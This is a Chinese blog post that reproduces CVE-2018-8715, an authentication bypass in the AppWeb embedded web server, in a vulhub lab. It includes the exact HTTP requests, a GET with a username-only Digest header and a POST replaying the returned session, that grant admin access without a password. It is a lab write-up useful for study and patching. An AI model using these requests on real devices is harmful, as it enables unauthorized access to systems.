AppWeb认证绕过漏洞(CVE-2018-8715)

最新推荐文章于 2024-05-29 13:35:56 发布
最新推荐文章于 2024-05-29 13:35:56 发布
阅读量973 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44311721/article/details/97893294
版权

AppWeb认证绕过漏洞(CVE-2018-8715)

  1. AppWeb简介:
    AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。
    AppWeb可以进行认证配置,其认证方式包括以下三种:

    (1)basic 传统HTTP基础认证

    (2)digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头

    (3)form 表单认证

    (4)详细介绍点击

  2. 漏洞简介:
    由于使用digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。

  3. 漏洞影响范围:

7.0.3之前的版本

  1. 漏洞复现:
    [1]搭建漏洞环境
    环境部署成功
    [2]访问目标:http://your-ip:8080
    显示需要输入密码[3]利用该漏洞需要知道一个已存在的用户名(漏洞局限性),当前环境下用户名为admin。
    [4]构造头Authorization: Digest username=admin,并发送如下数据包:
GET / HTTP/1.1
Host: 192.168.1.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin

返回200 ok,并返回了set-cookies,成功绕过!
在这里插入图片描述
[5]通过burp使用POST包发送session

POST / HTTP/1.1
Host: 192.168.1.131:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
-http-session: -2::http.session::c20ab9809ca2b4168bba60515005bc3a
Authorization: Digest username=admin

username=admin

成功绕过认证:
在这里插入图片描述参考:https://blog.csdn.net/weixin_42936566/article/details/87120710
https://github.com/suleisulei/vulhub/tree/master/appweb/CVE-2018-8715

skr...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
AppWeb认证绕过漏洞CVE-2018-8715)复现
yukinorong的博客
06-29 5644
漏洞信息 AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。 AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest 改进版HTTP基础认证认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 form 表单认证
[vulhub]appweb认证绕过漏洞--CVE-2018-8715
haoaaao的博客
04-28 363
0x00 前置 AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。 AppWeb可以进行认证配置,其认证方式包括以下三种: 1、basic 传统HTTP基础认证 2、digest 改进版HTTP基础认证认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
AppWeb空密码认证绕过漏洞CVE-2018-8715
weixin_43455294的博客
08-14 1374
容器简介:Appweb是一款超快速且紧凑的嵌入式Web服务器,可高效,安全地托管嵌入式Web应用程序。Appweb通过包含ESP Web框架和一系列广泛的功能,大大减少了开发Web应用程序的时间和成本。 影响版本:Appweb版本4.0到7.0.2 漏洞概述: 这里涉及到appweb的三种身份验证方式: basic 传统HTTP基础认证 digest 改进版HTTP基础认证认证成...
五种不寻常的身份验证绕过技术
最新发布
2401_84488651的博客
05-29 1318
就在过期之前,应用程序在终端/refresh/tokenlogin中向后端服务器发送了一个请求,该请求在标头和HTTP主体部分的用户名参数中包含有效的身份验证令牌。复杂的身份验证机制可能成为攻击者使用的最具隐蔽性的攻击手段,特别是在容易出现业务逻辑漏洞的应用程序上。进一步的测试表明,删除请求上的Authorization标头并更改HTTP主体上的用户名参数将为提供的用户名创建一个新的有效令牌。乍一看,它似乎是安全的,但对后端请求的分析显示,应用程序在重定向响应上返回了异常大的内容长度(超过40000字节)
Nacos身份认证绕过漏洞(QVD-2023-6271)
qq_50854662的博客
03-20 1万+
漏洞原理为开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。
CVE-2018-8715(AppWeb认证绕过漏洞)
weixin_51387754的博客
10-26 923
漏洞简介 漏洞编号:CVE-2018-8715 影响版本:7.0.3之前的版本 https://www.cvedetails.com/cve/CVE-2018-8715/ 漏洞产生原因: AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest改进版HTTP基础认证认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 form 表单认证 其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为nul
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
2. CVE-2018-15473:这个漏洞涉及到OpenSSH的公钥认证过程。如果攻击者能够操纵公钥文件的顺序,他们可能可以绕过特定的认证限制,从而获取未经授权的访问权限。 3. CVE-2018-15919:这是一个输入验证错误,可能...
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
Okta安全Web身份验证插件。「Okta Secure Web Authentication Plug-in」-crx插件
03-20
工作以外的周边 Okta浏览器插件可保护您的密码,并安全地将您登录到所有企业和个人应用程序。全球最大的组织和超过1亿人依靠Okta连接到组织内部和外部的应用程序,因为他们知道其凭据已受到保护。使用Okta浏览器插件,您可以:*只需单击一下即可自动登录您的企业和个人应用程序*将您自己的应用程序添加到Okta中*为所有应用程序快速快速生成安全,随机的密码*轻松访问Okta仪表板应用程序和选项卡*在多个Okta帐户之间无缝安全地切换您需要一个Okta帐户才能使用Okta浏览器插件。如果您无法通过Okta浏览器插件访问您的Okta帐户,请联系您的IT管理员。 支持语言:English
OpenWRT 下实现 Portal 认证(WEB 认证)
02-06
OpenWRT 下实现 Portal 认证(WEB 认证),转载
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
appweb认证绕过漏洞复现(CVE-2018-8715)
qq_63963927的博客
10-25 192
AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。
绕过网络认证,实现免验证上网原理与实战
热门推荐
Deng's Blog
04-01 2万+
本文介绍了绕过网络认证,实现免验证上网原理与实战方法。
AppWeb认证绕过漏洞复现(CVE-2018-8715
qq_45785324的博客
01-31 392
CVE-2018-8715漏洞复现
Appweb——Embedded Web Server
张同光 (Tongguang Zhang):Hello everyone !
06-04 706
Appweb——Embedded Web Server
PHP 输入验证漏洞 CVE-2018-10547
10-24
根据提供的引用内容,我没有找到与“PHP 输入验证漏洞 CVE-2018-10547”相关的信息。但是,我可以为您提供有关PHP漏洞的一些信息。 引用提到了PHP 7.1.x版本中的imap_mail函数null指针取消引用的漏洞,这是一个安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值